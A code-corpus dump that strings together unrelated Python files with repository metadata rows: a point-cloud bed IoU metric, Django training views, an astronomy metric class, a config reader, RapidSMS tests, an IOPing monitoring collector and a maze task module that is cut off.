    gt_pcd = np.nan_to_num(deepcopy(pcd)["points"])
    pred_pcd = np.nan_to_num(deepcopy(pcd)["points"])
    # Pixel IoU
    ## Project pred_bed on pred_floor -> pred_rect
    shape = pcd["shape"][::-1]
    gt_pcd = transform_with_conf(gt_pcd, gt_cfg, shape)
    pred_pcd = transform_with_conf(pred_pcd, pred_cfg, shape)
    # Bed-height cut-off: either estimated from the cloud (capped) or fixed.
    if use_z:
        gt_z = min(find_z(gt_pcd, end=1.4)+0.2, 1.35)
        mask_z = min(find_z(pred_pcd, end=1.4)+0.2, 1.35)
    else:
        gt_z, mask_z = 1.35, 1.35
    ## Annotate pixels -> compare -> IoU
    gt_mask = find_segmentation(gt_pcd, gt_cfg["bed"]["width"], gt_cfg["bed"]["length"], z=gt_z)
    pred_mask = find_segmentation(pred_pcd, pred_cfg["bed"]["width"], pred_cfg["bed"]["length"], z=mask_z)
    ## Rotation cossim: wraps angle differences into [0, 180] degrees.
    cossim = np.degrees(np.arccos(np.cos(np.radians(
        gt_cfg["bed"]["orientation"] - pred_cfg["bed"]["orientation"]
    ))))
    # Euclidean error between predicted and true bed centres.
    err_center = np.sqrt(
        (gt_cfg["bed"]["centerX"] - pred_cfg["bed"]["centerX"])**2 +
        (gt_cfg["bed"]["centerY"] - pred_cfg["bed"]["centerY"])**2
    )
    err_len = gt_cfg["bed"]["length"] - pred_cfg["bed"]["length"]
    err_width = gt_cfg["bed"]["width"] - pred_cfg["bed"]["width"]
    divers_errors = (cossim, err_center, err_len, err_width)
    iou_proj = bprojIoU(gt_cfg, pred_cfg)
    # Mean range of the points classified as bed by the prediction.
    pnts = pred_pcd[pred_mask==bed_class]
    pnts = np.mean(np.linalg.norm(pnts, axis=-1))
    return (0, iou_proj), divers_errors, pred_mask, gt_mask, pnts
from numpy.linalg import norm
from shapely.geometry import Polygon
from copy import deepcopy
import open3d
from tofnet.pointcloud.utils import rotate, transform_with_conf
from tofnet.pointcloud.visualize import visualize_pointcloud
from tofnet.annotations.segmentation import find_segmentation, find_z
def _rotate_from_cfg(cfg, vec):
    """Rotate *vec* by the camera inclination angles stored in *cfg*.

    Applies, in order: rotation by (180 - inclination) about x, a fixed
    180-degree rotation about z, then lateral_inclination about y.
    NOTE(review): the fixed pi rotation presumably flips between camera and
    world frames -- confirm against `rotate`'s axis convention.
    """
    angles = (
        180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"]
    )
    alpha, beta = (np.radians(a) for a in angles)
    vec = rotate(alpha, vec, axis='x')
    vec = rotate(np.pi, vec, axis='z')
    vec = rotate(beta, vec, axis='y')
    return vec
def floor_similarity(ground_cfg, pred_cfg, eps=1.e-8):
    """Angular difference (in degrees) between the floor orientations
    implied by two camera configs.

    Arguments:
        ground_cfg: ground truth config containing a "camera" section with
            inclination and lateral_inclination
        pred_cfg: prediction (same structure as ground_cfg)
        eps: lower bound on the norm product, guarding against division by
            zero in the cosine similarity

    Returns:
        similarity: angle in degrees between the two rotated reference
            vectors (arccos of their clipped cosine similarity)
    """
    reference = np.array([1, 1, 1])
    vec_gt = _rotate_from_cfg(ground_cfg, reference)
    vec_pred = _rotate_from_cfg(pred_cfg, reference)
    denom = max(norm(vec_gt) * norm(vec_pred), eps)
    cosine = np.clip(np.dot(vec_gt, vec_pred) / denom, -1, 1)
    return np.degrees(np.arccos(cosine))
def bed_similarity(ground_cfg, pred_cfg):
    """Compute 2d IoU for the bed, with common camera config."""
    # Placeholder: this metric has not been implemented yet.
    raise NotImplementedError()
def get_bbox_points(cfg):
    """Corner points of the bed bounding box, centred at the origin.

    Returns a (5, 2) array tracing the rectangle as a closed loop (the
    first corner is repeated at the end).
    """
    half_len = cfg["bed"]["length"] / 2
    half_w = cfg["bed"]["width"] / 2
    corners = [
        [half_len, half_w],
        [half_len, -half_w],
        [-half_len, -half_w],
        [-half_len, half_w],
        [half_len, half_w],
    ]
    return np.array(corners)
def bprojIoU(gt_cfg, pred_cfg):
    """ Computes the bounding box IoU from 2 different configs while accounting for
    differences in floor rotation
    """
    from shapely import geometry
    res = []
    # Build the 3D corner points of each config's bed box in camera space.
    for cfg in [gt_cfg, pred_cfg]:
        height = cfg["camera"].get("height", 2.6)
        angles = (
            180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"],
            cfg["bed"]["orientation"]
        )
        alpha, beta, gamma = (np.radians(a) for a in angles)
        center = [cfg["bed"]["centerX"], cfg["bed"]["centerY"]]
        # Bed rectangle corners centred at the origin, then rotated by the
        # bed orientation and translated to the bed centre (floor plane).
        points = get_bbox_points(cfg)
        points = rotate(-gamma, points)
        points += center
        # Lift to 3D at z = -camera_height, then undo the camera rotations.
        points3d = np.zeros((len(points), 3))
        points3d[:,:2] = points
        points3d[:,-1] = points3d[:,-1]-height
        points3d = rotate(-beta, points3d, axis='y')
        points3d = rotate(-np.pi, points3d, axis='z')
        points3d = rotate(-alpha, points3d, axis='x')
        res.append(points3d)
    gt_points, pred_points = res
    # compute floor normal
    N = np.cross(gt_points[1,:]-gt_points[0,:], gt_points[3,:]-gt_points[0,:])
    d = N@gt_points[0,:]
    # project pred on that plane
    T = (d - pred_points@N)/(N@N)
    projected_pred_points = pred_points + np.expand_dims(T, axis=-1)*np.expand_dims(N, axis=0)
    # compute iou (on the x/y coordinates of the common plane)
    gt_poly = geometry.Polygon(gt_points[:,:2])
    pr_poly = geometry.Polygon(projected_pred_points[:,:2])
    iou = gt_poly.intersection(pr_poly).area/gt_poly.union(pr_poly).area
    return iou
def cIoU(gt_mask, pred_mask, c):
    """Image-wise IoU of class *c* between a ground-truth and predicted mask."""
    in_pred = pred_mask == c
    in_gt = gt_mask == c
    intersection = np.sum(in_pred & in_gt)
    union = np.sum(in_pred | in_gt)
    # |A ∩ B| / |A ∪ B|  ==  tp / (tp + fp + fn)
    return intersection / union
def full_similarity(pcd, gt_cfg, pred_cfg, bed_class=2, sample=None, use_z=False):
    """Compare a ground-truth and a predicted config on the same point cloud.

    Returns a tuple:
        (0, iou_proj): projected bounding-box IoU (first slot unused),
        divers_errors: (orientation diff deg, centre error, length error,
                        width error),
        pred_mask, gt_mask: segmentation masks from each config,
        pnts: mean distance of predicted bed points from the origin.
    """
    gt_pcd = np.nan_to_num(deepcopy(pcd)["points"])
    pred_pcd = np.nan_to_num(deepcopy(pcd)["points"])
    # Pixel IoU
    ## Project pred_bed on pred_floor -> pred_rect
    shape = pcd["shape"][::-1]
    gt_pcd = transform_with_conf(gt_pcd, gt_cfg, shape)
    pred_pcd = transform_with_conf(pred_pcd, pred_cfg, shape)
    # Bed-height cut-off: either estimated from the cloud (capped) or fixed.
    if use_z:
        gt_z = min(find_z(gt_pcd, end=1.4)+0.2, 1.35)
        mask_z = min(find_z(pred_pcd, end=1.4)+0.2, 1.35)
    else:
        gt_z, mask_z = 1.35, 1.35
    ## Annotate pixels -> compare -> IoU
    gt_mask = find_segmentation(gt_pcd, gt_cfg["bed"]["width"], gt_cfg["bed"]["length"], z=gt_z)
    pred_mask = find_segmentation(pred_pcd, pred_cfg["bed"]["width"], pred_cfg["bed"]["length"], z=mask_z)
    ## Rotation cossim: wraps angle differences into [0, 180] degrees.
    cossim = np.degrees(np.arccos(np.cos(np.radians(
        gt_cfg["bed"]["orientation"] - pred_cfg["bed"]["orientation"]
    ))))
    # Euclidean error between predicted and true bed centres.
    err_center = np.sqrt(
        (gt_cfg["bed"]["centerX"] - pred_cfg["bed"]["centerX"])**2 +
        (gt_cfg["bed"]["centerY"] - pred_cfg["bed"]["centerY"])**2
    )
    err_len = gt_cfg["bed"]["length"] - pred_cfg["bed"]["length"]
    err_width = gt_cfg["bed"]["width"] - pred_cfg["bed"]["width"]
    divers_errors = (cossim, err_center, err_len, err_width)
    iou_proj = bprojIoU(gt_cfg, pred_cfg)
    # Mean range of the points classified as bed by the prediction.
    pnts = pred_pcd[pred_mask==bed_class]
    pnts = np.mean(np.linalg.norm(pnts, axis=-1))
    return (0, iou_proj), divers_errors, pred_mask, gt_mask, pnts
60e04fb4bf1ebf7c0f1ee24522888df26eb7dc5e | 7,189 | py | Python | amy/trainings/views.py | gaybro8777/amy | 3cf99aed58a0f0acf83d2645a30d8408208ccea9 | [
"MIT"
] | null | null | null | amy/trainings/views.py | gaybro8777/amy | 3cf99aed58a0f0acf83d2645a30d8408208ccea9 | [
"MIT"
] | null | null | null | amy/trainings/views.py | gaybro8777/amy | 3cf99aed58a0f0acf83d2645a30d8408208ccea9 | [
"MIT"
] | null | null | null | from django.contrib import messages
from django.db.models import (
Case,
When,
IntegerField,
Count,
F,
Sum,
Prefetch,
)
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from trainings.filters import (
TraineeFilter,
)
from trainings.forms import (
TrainingProgressForm,
BulkAddTrainingProgressForm,
BulkDiscardProgressesForm,
)
from workshops.base_views import (
AMYCreateView,
AMYUpdateView,
AMYDeleteView,
AMYListView,
RedirectSupportMixin,
PrepopulationSupportMixin,
)
from workshops.models import (
Badge,
Event,
Person,
Task,
TrainingProgress,
TrainingRequirement,
)
from workshops.util import (
get_pagination_items,
admin_required,
OnlyForAdminsMixin,
)
# ------------------------------------------------------------
# Instructor Training related views
@admin_required
| 35.068293 | 92 | 0.58826 | from django.contrib import messages
from django.db.models import (
Case,
When,
IntegerField,
Count,
F,
Sum,
Prefetch,
)
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from trainings.filters import (
TraineeFilter,
)
from trainings.forms import (
TrainingProgressForm,
BulkAddTrainingProgressForm,
BulkDiscardProgressesForm,
)
from workshops.base_views import (
AMYCreateView,
AMYUpdateView,
AMYDeleteView,
AMYListView,
RedirectSupportMixin,
PrepopulationSupportMixin,
)
from workshops.models import (
Badge,
Event,
Person,
Task,
TrainingProgress,
TrainingRequirement,
)
from workshops.util import (
get_pagination_items,
admin_required,
OnlyForAdminsMixin,
)
class AllTrainings(OnlyForAdminsMixin, AMYListView):
context_object_name = 'all_trainings'
template_name = 'trainings/all_trainings.html'
queryset = Event.objects.filter(tags__name='TTT').annotate(
trainees=Count(Case(When(task__role__name='learner',
then=F('task__person__id')),
output_field=IntegerField()),
distinct=True),
finished=Count(Case(When(task__role__name='learner',
task__person__badges__in=Badge.objects.instructor_badges(),
then=F('task__person__id')),
output_field=IntegerField()),
distinct=True),
).exclude(trainees=0).order_by('-start')
title = 'All Instructor Trainings'
# ------------------------------------------------------------
# Instructor Training related views
class TrainingProgressCreate(RedirectSupportMixin,
PrepopulationSupportMixin,
OnlyForAdminsMixin,
AMYCreateView):
model = TrainingProgress
form_class = TrainingProgressForm
populate_fields = ['trainee']
def get_initial(self):
initial = super().get_initial()
initial['evaluated_by'] = self.request.user
return initial
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['form'].helper = context['form'].create_helper
return context
class TrainingProgressUpdate(RedirectSupportMixin, OnlyForAdminsMixin,
AMYUpdateView):
model = TrainingProgress
form_class = TrainingProgressForm
template_name = 'trainings/trainingprogress_form.html'
class TrainingProgressDelete(RedirectSupportMixin, OnlyForAdminsMixin,
AMYDeleteView):
model = TrainingProgress
success_url = reverse_lazy('all_trainees')
def all_trainees_queryset():
def has_badge(badge):
return Sum(Case(When(badges__name=badge, then=1),
default=0,
output_field=IntegerField()))
return (
Person.objects
.annotate_with_instructor_eligibility()
.prefetch_related(
Prefetch(
'task_set',
to_attr='training_tasks',
queryset=Task.objects.filter(role__name='learner',
event__tags__name='TTT')
),
'training_tasks__event',
'trainingrequest_set',
'trainingprogress_set',
'trainingprogress_set__requirement',
'trainingprogress_set__evaluated_by',
).annotate(
is_swc_instructor=has_badge('swc-instructor'),
is_dc_instructor=has_badge('dc-instructor'),
is_lc_instructor=has_badge('lc-instructor'),
is_instructor=Sum(
Case(
When(
badges__name__in=Badge.INSTRUCTOR_BADGES,
then=1
),
default=0,
output_field=IntegerField()
)
),
).order_by('family', 'personal')
)
@admin_required
def all_trainees(request):
filter = TraineeFilter(
request.GET,
queryset=all_trainees_queryset(),
)
trainees = get_pagination_items(request, filter.qs)
if request.method == 'POST' and 'discard' in request.POST:
# Bulk discard progress of selected trainees
form = BulkAddTrainingProgressForm()
discard_form = BulkDiscardProgressesForm(request.POST)
if discard_form.is_valid():
for trainee in discard_form.cleaned_data['trainees']:
TrainingProgress.objects.filter(trainee=trainee)\
.update(discarded=True)
messages.success(request, 'Successfully discarded progress of '
'all selected trainees.')
# Raw uri contains GET parameters from django filters. We use it
# to preserve filter settings.
return redirect(request.get_raw_uri())
elif request.method == 'POST' and 'submit' in request.POST:
# Bulk add progress to selected trainees
instance = TrainingProgress(evaluated_by=request.user)
form = BulkAddTrainingProgressForm(request.POST, instance=instance)
discard_form = BulkDiscardProgressesForm()
if form.is_valid():
for trainee in form.cleaned_data['trainees']:
TrainingProgress.objects.create(
trainee=trainee,
evaluated_by=request.user,
requirement=form.cleaned_data['requirement'],
state=form.cleaned_data['state'],
discarded=False,
event=form.cleaned_data['event'],
url=form.cleaned_data['url'],
notes=form.cleaned_data['notes'],
)
messages.success(request, 'Successfully changed progress of '
'all selected trainees.')
return redirect(request.get_raw_uri())
else: # GET request
# If the user filters by training, we want to set initial values for
# "requirement" and "training" fields.
training_id = request.GET.get('training', None) or None
try:
initial = {
'event': Event.objects.get(pk=training_id),
'requirement': TrainingRequirement.objects.get(name='Training')
}
except Event.DoesNotExist: # or there is no `training` GET parameter
initial = None
form = BulkAddTrainingProgressForm(initial=initial)
discard_form = BulkDiscardProgressesForm()
context = {'title': 'Trainees',
'all_trainees': trainees,
'swc': Badge.objects.get(name='swc-instructor'),
'dc': Badge.objects.get(name='dc-instructor'),
'lc': Badge.objects.get(name='lc-instructor'),
'filter': filter,
'form': form,
'discard_form': discard_form}
return render(request, 'trainings/all_trainees.html', context)
| 4,600 | 1,529 | 137 |
cda9f963cddac6e0d22909129a807ae43e6470aa | 2,865 | py | Python | rubin_sim/maf/mafContrib/GW170817DetMetric.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | [
"MIT"
] | null | null | null | rubin_sim/maf/mafContrib/GW170817DetMetric.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | [
"MIT"
] | null | null | null | rubin_sim/maf/mafContrib/GW170817DetMetric.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | [
"MIT"
] | null | null | null | # Metric for kilonova detectability based on GW170817 SED used in Scolnic et
# al. 2018 and Setzer et al. 2019. The chosen detection criteria are related to
# those used in the LSST DESC white paper detectability work and the two
# references above.
#
# Contact for this code:
# christian.setzer@fysik.su.se
from pathlib import Path
from .transientAsciiSEDMetric import transientAsciiSEDMetric
__all__ = ["GW170817DetMetric"]
base_path = Path(__file__).parent
class GW170817DetMetric(transientAsciiSEDMetric):
"""
Wrapper metric class for GW170817-like kilonovae based on the
transientAsciiSEDMetric. Defaults are set to those corresponding to similar
detection criteria used in Scolnic et al. 2018 and Setzer et al. 2019.
However, due to the simplified nature of transient distribution for
computing this metric, the criteria have been altered to only include
criteria two and three. The chosen redshift is at the approximate mean
redshift of the detected cosmological redshift distribution shown in
Setzer et al. 2019.
Parameters
-----------
ascii_file : str, optional
The ascii file containing the inputs for the SED. The file must
contain three columns - ['phase', 'wave', 'flux'] -
of phase/epoch (in days), wavelength (Angstroms), and
flux (ergs/s/Angstrom). Default, data provided with sims_maf_contrib.
metric_name : str, optional
Name of the metric, can be overwritten by user or child metric.
z: float, optional
Cosmological redshift at which to consider observations of the
tranisent SED. Default 0.08.
num_filters : int, optional
Number of filters that need to be observed for an object to be
counted as detected. Default 2. (if num_per_lightcurve is 0, then
this will be reset to 0).
filter_time : float, optional
The time within which observations in at least num_filters are
required (in days). Default 25.0 days.
num_phases_to_run : int, optional
Sets the number of phases that should be checked.
One can imagine pathological cadences where many objects pass the
detection criteria, but would not if the observations were offset
by a phase-shift. Default 5.
"""
def __init__(
self,
ascii_file=(base_path / "../data/DECAMGemini_SED.txt").resolve(),
metric_name="GW170817DetMetric",
z=0.08,
num_filters=2,
filter_time=25.0,
num_phases_to_run=5,
**kwargs
):
"""
"""
super(GW170817DetMetric, self).__init__(
ascii_file=ascii_file,
metric_name=metric_name,
z=z,
num_filters=num_filters,
filter_time=filter_time,
num_phases_to_run=num_phases_to_run,
**kwargs
)
| 38.716216 | 79 | 0.683421 | # Metric for kilonova detectability based on GW170817 SED used in Scolnic et
# al. 2018 and Setzer et al. 2019. The chosen detection criteria are related to
# those used in the LSST DESC white paper detectability work and the two
# references above.
#
# Contact for this code:
# christian.setzer@fysik.su.se
from pathlib import Path
from .transientAsciiSEDMetric import transientAsciiSEDMetric
__all__ = ["GW170817DetMetric"]
base_path = Path(__file__).parent
class GW170817DetMetric(transientAsciiSEDMetric):
"""
Wrapper metric class for GW170817-like kilonovae based on the
transientAsciiSEDMetric. Defaults are set to those corresponding to similar
detection criteria used in Scolnic et al. 2018 and Setzer et al. 2019.
However, due to the simplified nature of transient distribution for
computing this metric, the criteria have been altered to only include
criteria two and three. The chosen redshift is at the approximate mean
redshift of the detected cosmological redshift distribution shown in
Setzer et al. 2019.
Parameters
-----------
ascii_file : str, optional
The ascii file containing the inputs for the SED. The file must
contain three columns - ['phase', 'wave', 'flux'] -
of phase/epoch (in days), wavelength (Angstroms), and
flux (ergs/s/Angstrom). Default, data provided with sims_maf_contrib.
metric_name : str, optional
Name of the metric, can be overwritten by user or child metric.
z: float, optional
Cosmological redshift at which to consider observations of the
tranisent SED. Default 0.08.
num_filters : int, optional
Number of filters that need to be observed for an object to be
counted as detected. Default 2. (if num_per_lightcurve is 0, then
this will be reset to 0).
filter_time : float, optional
The time within which observations in at least num_filters are
required (in days). Default 25.0 days.
num_phases_to_run : int, optional
Sets the number of phases that should be checked.
One can imagine pathological cadences where many objects pass the
detection criteria, but would not if the observations were offset
by a phase-shift. Default 5.
"""
def __init__(
self,
ascii_file=(base_path / "../data/DECAMGemini_SED.txt").resolve(),
metric_name="GW170817DetMetric",
z=0.08,
num_filters=2,
filter_time=25.0,
num_phases_to_run=5,
**kwargs
):
"""
"""
super(GW170817DetMetric, self).__init__(
ascii_file=ascii_file,
metric_name=metric_name,
z=z,
num_filters=num_filters,
filter_time=filter_time,
num_phases_to_run=num_phases_to_run,
**kwargs
)
| 0 | 0 | 0 |
d7a14ba5f0d62e4479705ffce4dcbd1fd8888727 | 1,622 | py | Python | lib/Config.py | Ch4p34uN0iR/CVE-Scan | d75c8deea53c7c2befd19b66a7f2484201f5f8b6 | [
"BSD-4-Clause"
] | 246 | 2015-01-31T16:21:40.000Z | 2022-03-23T06:58:06.000Z | lib/Config.py | Ch4p34uN0iR/CVE-Scan | d75c8deea53c7c2befd19b66a7f2484201f5f8b6 | [
"BSD-4-Clause"
] | 18 | 2015-02-11T22:24:29.000Z | 2022-01-26T22:43:32.000Z | lib/Config.py | tracid56/CVE-Scan | cf919a67b156fef057835cdde0951e527c486a62 | [
"BSD-4-Clause"
] | 71 | 2015-02-09T04:07:04.000Z | 2022-02-18T13:21:24.000Z | #!/usr/bin/env python3.3
# -*- coding: utf-8 -*-
#
# Read configuration file or return default values
#
# Copyright (c) 2015 NorthernSec
# Copyright (c) 2015 Pieter-Jan Moreels
# This software is licensed under the Original BSD License
# Imports
import os
runpath=os.path.dirname(os.path.realpath(__file__))
import configparser
| 27.491525 | 70 | 0.667078 | #!/usr/bin/env python3.3
# -*- coding: utf-8 -*-
#
# Read configuration file or return default values
#
# Copyright (c) 2015 NorthernSec
# Copyright (c) 2015 Pieter-Jan Moreels
# This software is licensed under the Original BSD License
# Imports
import os
runpath=os.path.dirname(os.path.realpath(__file__))
import configparser
class Configuration():
cp=configparser.ConfigParser()
cp.read(os.path.join(runpath, '../etc/configuration.ini'))
default={'flaskHost': '127.0.0.1', 'flaskPort': 5050,
'flaskDebug': True,
'cve-searchHost':'localhost', 'cve-searchPort':5000,
'cve-searchSSL': False}
@classmethod
def read(cls, section, item, default):
result=default
try:
if type(default) == bool:
result=cls.cp.getboolean(section, item)
elif type(default) == int:
result=cls.cp.getint(section, item)
else:
result=cls.cp.get(section,item)
except:
pass
return result
# Flask
@classmethod
def getFlaskHost(cls):
return cls.read('Webserver','Host',cls.default['flaskHost'])
@classmethod
def getFlaskPort(cls):
return cls.read('Webserver','Port',cls.default['flaskPort'])
@classmethod
def getFlaskDebug(cls):
return cls.read('Webserver','Debug',cls.default['flaskDebug'])
# CVE-Search
@classmethod
def getCVESearch(cls):
h=cls.read('CVE-Search', 'Host', cls.default['cve-searchHost'])
p=cls.read('CVE-Search', 'Port', cls.default['cve-searchPort'])
return (h,p)
@classmethod
def getCVESearchSSL(cls):
return cls.read('CVE-Search', 'SSL', cls.default['cve-searchSSL'])
| 725 | 544 | 23 |
7c5fed6d7a6a960b0030228d0eb5efb838ef3880 | 559 | py | Python | misc/test.py | gingerkirsch/playing-with-python | 5c958b22e13207e65bcaa94a982d71e2fe024e22 | [
"MIT"
] | null | null | null | misc/test.py | gingerkirsch/playing-with-python | 5c958b22e13207e65bcaa94a982d71e2fe024e22 | [
"MIT"
] | null | null | null | misc/test.py | gingerkirsch/playing-with-python | 5c958b22e13207e65bcaa94a982d71e2fe024e22 | [
"MIT"
] | null | null | null | n = 1000
a = list(range(n))
b = dict.fromkeys(range(n))
n = 10
items = range(n)
o_one(items) # 1 operation
o_n(items) # n operations
o_n_squared(items) # n*n = 10 * 10 = 100 operations
| 19.275862 | 51 | 0.595707 | n = 1000
a = list(range(n))
b = dict.fromkeys(range(n))
def o_one(items):
return 1 # 1 operation so O(1)
def o_n(items):
total = 0
# Walks through all items once so O(n)
for item in items:
total += item
return total
def o_n_squared(items):
total = 0
# Walks through all items n*n times so O(n**2)
for a in items:
for b in items:
total += a * b
return total
n = 10
items = range(n)
o_one(items) # 1 operation
o_n(items) # n operations
o_n_squared(items) # n*n = 10 * 10 = 100 operations
| 300 | 0 | 72 |
7449c8ca85a461ad90c59c85503c862e83ebb9ba | 2,173 | py | Python | lib/rapidsms/tests/test_router.py | dimagi/rapidsms-core-dev | aed753545ae01c279489f5a00e7f12ec432e11bf | [
"BSD-3-Clause"
] | null | null | null | lib/rapidsms/tests/test_router.py | dimagi/rapidsms-core-dev | aed753545ae01c279489f5a00e7f12ec432e11bf | [
"BSD-3-Clause"
] | null | null | null | lib/rapidsms/tests/test_router.py | dimagi/rapidsms-core-dev | aed753545ae01c279489f5a00e7f12ec432e11bf | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
| 26.5 | 73 | 0.680166 | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
def test_router_finds_apps():
router = Router()
router.add_app("rapidsms.contrib.default")
from rapidsms.contrib.default.app import App
assert_equals(len(router.apps), 1)
app = router.get_app("rapidsms.contrib.default")
assert_equals(type(app), App)
def test_router_returns_none_on_invalid_apps():
assert_equals(Router().get_app("not.a.valid.app"), None)
def test_router_raises_on_uninstalled_apps():
assert_raises(KeyError, Router().get_app, "rapidsms.contrib.default")
def test_router_starts_and_stops_apps_and_backends():
class MockApp(AppBase):
def start(self):
self.started = True
def stop(self):
self.stopped = True
class MockBackend(BackendBase):
def start(self):
self.started = True
BackendBase.start(self)
def stop(self):
self.stopped = True
BackendBase.stop(self)
router = Router()
app = MockApp(router)
router.apps.append(app)
backend = MockBackend(router, "mock")
router.backends["mock"] = backend
assert hasattr(app, 'started') == False
assert hasattr(app, 'stopped') == False
assert hasattr(backend, 'started') == False
assert hasattr(backend, 'stopped') == False
# start in a separate thread, so we can test it asynchronously.
worker = threading.Thread(target=router.start)
worker.daemon = True
worker.start()
# wait until the router has started.
while not router.running:
time.sleep(0.1)
assert_equals(app.started, True)
assert_equals(backend.started, True)
assert hasattr(app, 'stopped') == False
assert hasattr(backend, 'stopped') == False
# wait until the router has stopped.
router.stop()
worker.join()
assert_equals(app.started, True)
assert_equals(app.stopped, True)
assert_equals(backend.started, True)
assert_equals(backend.stopped, True)
| 1,843 | 0 | 92 |
e7ad85de2ac83380c9e2a40ebc5a66951c7e0ca4 | 1,927 | py | Python | ioping/ioping.py | annttu/Diamond-collectors | 9abe896f5702418136d609f907270b1efa26c491 | [
"MIT",
"Unlicense"
] | null | null | null | ioping/ioping.py | annttu/Diamond-collectors | 9abe896f5702418136d609f907270b1efa26c491 | [
"MIT",
"Unlicense"
] | 1 | 2016-11-01T13:43:11.000Z | 2016-11-02T06:50:01.000Z | ioping/ioping.py | annttu/Diamond-collectors | 9abe896f5702418136d609f907270b1efa26c491 | [
"MIT",
"Unlicense"
] | null | null | null |
"""
IOPing plugin for Diamond.
Author: Antti Jaakkola
#### Dependencies
* ioping
Create /usr/share/diamond/collectors/ioping directory and copy this plugin to it.
mkdir /usr/share/diamond/collectors/ioping
cp ioping/ioping.py /usr/share/diamond/collectors/ioping/
Create config file /etc/diamond/collectors/IOPing.conf with content:
enabled=True
Enjoy statistics!
"""
import diamond.collector
import subprocess
| 26.040541 | 89 | 0.585885 |
"""
IOPing plugin for Diamond.
Author: Antti Jaakkola
#### Dependencies
* ioping
Create /usr/share/diamond/collectors/ioping directory and copy this plugin to it.
mkdir /usr/share/diamond/collectors/ioping
cp ioping/ioping.py /usr/share/diamond/collectors/ioping/
Create config file /etc/diamond/collectors/IOPing.conf with content:
enabled=True
Enjoy statistics!
"""
import diamond.collector
import subprocess
class IOPingCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(IOPingCollector, self).get_default_config_help()
config_help.update({
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(IOPingCollector, self).get_default_config()
config.update({
'path': 'ioping',
'directory': '/tmp'
})
self.arcstat = None
return config
def collect(self):
"""
Overrides the Collector.collect method
"""
path = self.config['directory']
interval = int(self.config['interval']) / 3
try:
output = subprocess.check_output(['ioping', '-w', str(interval), '-q', path])
except subprocess.CalledProcessError, err:
self.log.info(
'Could not get stats: %s' % err)
self.log.exception('Could not get stats')
return {}
for line in output.splitlines():
if line.startswith('min/avg/max/mdev'):
# min/avg/max/mdev = 243 us / 438 us / 552 us / 92 us
values = line.split("=")[1]
values = dict(zip(['min', 'avg', 'max', 'mdev'],
[int(x.split()[0].strip()) for x in values.split("/")]))
for key, value in values.items():
self.publish(key, value)
| 157 | 1,320 | 23 |
fbb1ede1e97a9d60cbdc658c4844084f3866d59b | 1,948 | py | Python | gfsa/datasets/mazes/maze_task.py | muell-monster/google-research | 04d2024f4723bc4be3d639a668c19fb1f6a31478 | [
"Apache-2.0"
] | 3 | 2021-01-18T04:46:49.000Z | 2021-03-05T09:21:40.000Z | gfsa/datasets/mazes/maze_task.py | Alfaxad/google-research | 2c0043ecd507e75e2df9973a3015daf9253e1467 | [
"Apache-2.0"
] | 7 | 2021-11-10T19:44:38.000Z | 2022-02-10T06:48:39.000Z | gfsa/datasets/mazes/maze_task.py | Alfaxad/google-research | 2c0043ecd507e75e2df9973a3015daf9253e1467 | [
"Apache-2.0"
] | 4 | 2021-02-08T10:25:45.000Z | 2021-04-17T14:46:26.000Z | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Constants and functions for maze task."""
from typing import List, Tuple
from gfsa import automaton_builder
from gfsa import graph_types
from gfsa.datasets import graph_bundle
from gfsa.datasets.mazes import maze_schema
DIRECTION_ORDERING = "LRUD"
def maze_primitive_edges(
maze_graph
):
"""Build a graph bundle for a given maze.
Args:
maze_graph: Encoded graph representing the maze.
Returns:
List of edges corresponding to primitive actions in the maze.
"""
primitives = []
for node_id, node_info in maze_graph.items():
for i, direction in enumerate(DIRECTION_ORDERING):
out_key = graph_types.OutEdgeType(f"{direction}_out")
if out_key in node_info.out_edges:
dest, = node_info.out_edges[out_key]
primitives.append((node_id, dest.node_id, i))
else:
primitives.append((node_id, node_id, i))
return primitives
SCHEMA = maze_schema.build_maze_schema(2)
# Backtracking doesn't make sense for maze environment.
BUILDER = automaton_builder.AutomatonBuilder(SCHEMA, with_backtrack=False)
PADDING_CONFIG = graph_bundle.PaddingConfig(
static_max_metadata=automaton_builder.EncodedGraphMetadata(
num_nodes=256, num_input_tagged_nodes=512),
max_initial_transitions=512,
max_in_tagged_transitions=2048,
max_edges=1024)
| 29.969231 | 74 | 0.754107 | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Constants and functions for maze task."""
from typing import List, Tuple
from gfsa import automaton_builder
from gfsa import graph_types
from gfsa.datasets import graph_bundle
from gfsa.datasets.mazes import maze_schema
DIRECTION_ORDERING = "LRUD"
def maze_primitive_edges(
maze_graph
):
"""Build a graph bundle for a given maze.
Args:
maze_graph: Encoded graph representing the maze.
